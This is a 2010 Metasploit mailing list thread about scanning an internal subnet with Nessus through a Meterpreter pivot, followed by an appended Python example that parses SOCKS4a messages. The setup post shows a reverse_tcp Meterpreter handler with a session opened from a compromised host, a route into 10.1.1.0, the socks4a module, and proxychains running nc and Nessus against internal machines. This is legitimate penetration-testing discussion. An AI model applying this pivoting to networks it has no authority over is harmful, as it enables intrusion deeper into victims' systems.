Metasploit mailing list archives
Re: nessus scanning through a metasploit tunnel
From: Robin Wood <robin () digininja org>
Date: Thu, 21 Oct 2010 10:58:48 +0100
On 19 October 2010 21:32, <egypt () metasploit com> wrote:
> You can use the new auxiliary/server/socks4a module to do the same thing without having to upload an ssh server.
>
> egypt
I've just had a try with the socks proxy and had partial success. I can get Nessus to scan the machine I've compromised but nothing else on the network. This is my setup, should this work?

The machines I've got are:

10.1.1.5 - compromised machine
10.1.1.2 - other machine on that subnet I want to scan
192.168.0.2 - attacking machine

First setup the meterpreter connection

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lport 31337
lport => 31337
msf exploit(handler) > set lhost 192.168.0.2
lhost => 192.168.0.2
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 192.168.0.2:31337
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 192.168.0.80
[*] Meterpreter session 1 opened (192.168.0.2:31337 -> 192.168.0.80:16218) at Thu Oct 21 10:25:49 +0100 2010

Add the route

msf exploit(handler) > route add 10.1.1.0 255.255.255.0 1

Start the SOCKS proxy

msf exploit(handler) > use auxiliary/server/socks4a
msf auxiliary(socks4a) > run
[*] Auxiliary module execution completed
msf auxiliary(socks4a) >
[*] Starting the socks4a proxy server

Check the proxy is working with the proxychains config pointing at port 1080

# proxychains nc 10.1.1.2 445
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:1080-<><>-10.1.1.2:445-<><>-OK
abc

Now start Nessus

proxychains ./nessus-service -D

I've had various things happen here. I managed to start scanning 10.1.1.5 (the compromised machine) once or twice but not every time; it hasn't yet completed, it usually dies after detecting some open ports. I've never managed to scan 10.1.1.2. If I ask it to scan both, the metasploit session locks up and I have to kill it with a ctrl-c. The netcat connection that used to work also stops working at this point.

It seems like the socks4a module is getting overloaded and locking up with the amount of traffic that Nessus is trying to send through it. Does that sound likely?

Robin
> On Tue, Oct 19, 2010 at 1:43 PM, Robin Wood <robin () digininja org> wrote:
>> On 19 October 2010 18:06, Zate Berg <zate75 () gmail com> wrote:
>>> To add a bit more to that, Nessus doesn't support scanning through SOCKS proxies. You could look at this for inspiration if you decide that sounds like a challenge ;)
>>> http://pauldotcom.com/2010/03/nessus-scanning-through-a-meta.html
>>> http://pauldotcom.com/2010/03/ssh-gymnastics-with-proxychain.html
>>
>> I've seen those ideas before but I figured that if I could get it through directly then it would avoid having to install anything on the target machine. Having to get an ssh server on there doesn't really appeal.
>>
>>> Zate
>>>
>>> On Tue, Oct 19, 2010 at 12:11 PM, Zate Berg <zate75 () gmail com> wrote:
>>>> Not something that I think can be done effectively right now. Pro might open up some options to allow this but I haven't experimented enough.
>>>>
>>>> Zate
>>>>
>>>> On Tue, Oct 19, 2010 at 11:41 AM, Robin Wood <robin () digininja org> wrote:
>>>>> I've been playing with running Nessus scans through Metasploit and got it working fine, but I then tried to run it through a route set up through a Meterpreter tunnel and it didn't work. I assume that this is because all Metasploit is doing is just accessing Nessus through its API and it isn't actually integrating with Nessus. Is there any way, now we have the Nessus integration, to get it to scan through a Meterpreter tunnel? I know that it can be done through an SSH tunnel being installed on the target machine but it would be nice to be able to run it directly through Metasploit routing.
>>>>>
>>>>> Robin
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
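As an added illustration (not code from this thread, from Metasploit or from Nessus), the following Python encodes and decodes the SOCKS4a CONNECT request and 8-byte reply that a relay such as auxiliary/server/socks4a carries. Each request names exactly one TCP destination, so anything a scanner does outside a TCP connect (ICMP host discovery, UDP probes, SYN scans) has no representation in the protocol, which is the root of the "Nessus doesn't support SOCKS" problem discussed above. The USERID values and the 10.1.1.2:445 exchange below are constructed to mirror the proxychains check in Robin's setup.

```python
import struct

SOCKS_VERSION = 4
CMD_CONNECT = 1          # the only operation a SOCKS4a relay offers: one TCP stream
REPLY_GRANTED = 0x5A
REPLY_REJECTED = 0x5B


def build_connect(host, port, user_id=b""):
    """Encode a SOCKS4a CONNECT for host:port. DSTIP is the 4a marker 0.0.0.1,
    so the proxy resolves/routes `host` itself; the name follows the NUL-ended USERID."""
    if not 0 < port < 65536:
        raise ValueError("port out of range")
    head = struct.pack("!BBH4s", SOCKS_VERSION, CMD_CONNECT, port, b"\x00\x00\x00\x01")
    return head + user_id + b"\x00" + host.encode("ascii") + b"\x00"


def parse_request(data):
    """Decode a SOCKS4 or SOCKS4a request the way the proxy would see it."""
    if len(data) < 9:
        raise ValueError("truncated request")
    vn, cd, port, ip = struct.unpack("!BBH4s", data[:8])
    if vn != SOCKS_VERSION:
        raise ValueError("not a SOCKS4 request")
    user_id, sep, rest = data[8:].partition(b"\x00")
    if not sep:
        raise ValueError("USERID not NUL-terminated")
    if ip[:3] == b"\x00\x00\x00" and ip[3] != 0:   # 0.0.0.x: a hostname follows
        host, sep, _ = rest.partition(b"\x00")
        if not sep:
            raise ValueError("hostname not NUL-terminated")
        dest = host.decode("ascii")
    else:                                           # plain SOCKS4: literal IPv4
        dest = ".".join(str(b) for b in ip)
    return {"command": cd, "host": dest, "port": port, "user_id": user_id}


def parse_reply(data):
    """Return True if the 8-byte reply grants the connection (code 0x5A)."""
    if len(data) != 8 or data[0] != 0:
        raise ValueError("malformed reply")
    return data[1] == REPLY_GRANTED


if __name__ == "__main__":
    # Constructed exchange: CONNECT to 10.1.1.2:445 via the local proxy, answered "granted".
    req = build_connect("10.1.1.2", 445)
    print(parse_request(req))
    print(parse_reply(bytes([0, REPLY_GRANTED]) + bytes(6)))  # True
```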